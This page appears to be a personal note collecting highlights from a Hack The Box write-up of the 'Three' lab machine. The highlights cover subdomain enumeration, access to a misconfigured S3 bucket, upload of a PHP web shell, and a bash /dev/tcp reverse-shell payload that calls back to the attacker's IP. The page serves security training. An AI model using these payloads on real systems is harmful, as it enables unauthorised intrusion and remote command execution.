Three Write-Up - Nikola's Digital Garden

#readwise # Three Write-Up ![rw-book-cover](https://readwise-assets.s3.amazonaws.com/media/reader/parsed_document_assets/283221390/OrUlesPXdtjjJumS8OnJGYSF-kCw_M0Oi0GM_5YCU7w-cove_uMEfj49.png) ## Metadata - Author: [[Hack The Box]] - Full Title: Three Write-Up - URL: https://readwise.io/reader/document_raw_content/283221390 ## Summary Organizations use cloud services for various purposes, making secure cloud configurations essential. The "Three" is a Linux box that utilizes an AWS S3 bucket for storage. By exploiting this poorly configured S3 bucket, we can upload a PHP shell to gain remote code execution. Finally, we can retrieve the flag from the server after establishing a reverse shell connection. ## Highlights Three is a Linux box that includes a website, which utilizes an AWS S3 bucket as its cloud-storage device. We can exploit this poorly configured S3 bucket and upload a reverse shell on it. We can then visit the corresponding URL to execute the reverse file and ultimately retrieve the flag. ([View Highlight](https://read.readwise.io/read/01jpmbx43es2ecvfjvntwh1b26)) --- As we have the domain thetoppers.htb , let us enumerate for any other sub-domains that may be present on the same server. There are different enumeration tools available for this purpose like gobuster , wfuzz , feroxbuster etc. As of this writeup, we will be using gobuster for sub-domain enumeration using the following command. ```sh gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb ``` ([View Highlight](https://read.readwise.io/read/01jpmc00jbf74rj6tt8pjmxwck)) --- Note: If using Gobuster version 3.2.0 and above we also have to add the --append-domain flag to our command so that the enumeration takes into account the known vHost ( thetoppers.htb ) and appends it to the words found in the wordlist ( word.thetoppers.htb ). ([View Highlight](https://read.readwise.io/read/01jpmc0e90hfz11k1wm7hckh1k)) --- The gobuster result shows that there exists a sub-domain called s3.thetoppers.htb . ([View Highlight](https://read.readwise.io/read/01jpmc116hddt3cb59jbjdtpd1)) --- We can interact with this S3 bucket with the aid of the `awscli` utility. It can be installed on Linux using ```sh sudo apt install awscli ``` First, we need to configure it using `aws configure`. We will be using an arbitrary value for all the fields, as sometimes the server is configured to not check authentication (still, it must be configured to something for `awscli` to work). ([View Highlight](https://read.readwise.io/read/01jrjy29eg9xe763wmakpxnx04)) ^a8cnbc --- We can list all of the S3 buckets hosted by the server by using the `ls` command. ```sh aws --endpoint=http://s3.thetoppers.htb s3 ls ``` ([View Highlight](https://read.readwise.io/read/01jrjy2sraz76rd751t83sga7c)) --- We can also use the `ls` command to list objects and common prefixes under the specified bucket. ```sh aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb ``` ([View Highlight](https://read.readwise.io/read/01jrjy3a17nrv0tfpcnjrhz0je)) --- `awscli` has got another feature that allows us to copy files to a remote bucket. We already know that the website is using PHP. Thus, we can try uploading a PHP shell file to the S3 bucket and since it's uploaded to the webroot directory we can visit this webpage in the browser, which will, in turn, execute this file and we will achieve remote code execution. ([View Highlight](https://read.readwise.io/read/01jrjy43kcgmz34cn3s5cgwzeh)) --- We can use the following PHP one-liner which uses the `system()` function which takes the URL parameter `cmd` as an input and executes it as a system command. `<?php system($_GET["cmd"]); ?>` Let's create a PHP file to upload: ```sh echo '<?php system($_GET["cmd"]); ?>' > shell.php ``` ([View Highlight](https://read.readwise.io/read/01jpmc1zmc4ygfb7mm2cpp9jay)) --- Then, we can upload this PHP shell to the thetoppers.htb S3 bucket using the following command. ```sh aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb ``` ([View Highlight](https://read.readwise.io/read/01jrjy4cjx6dc7tjhrzxz35sff)) --- Let's get a reverse shell by creating a new file shell.sh containing the following bash reverse shell payload which will connect back to our local machine on port 1337 . ```bash #!/bin/bash bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1 ``` We will start a `ncat` listener on our local port 1337 using the following command. ```sh nc -nvlp 1337 ``` ([View Highlight](https://read.readwise.io/read/01jpmc2m9az3kwxvmzr9mr18c9))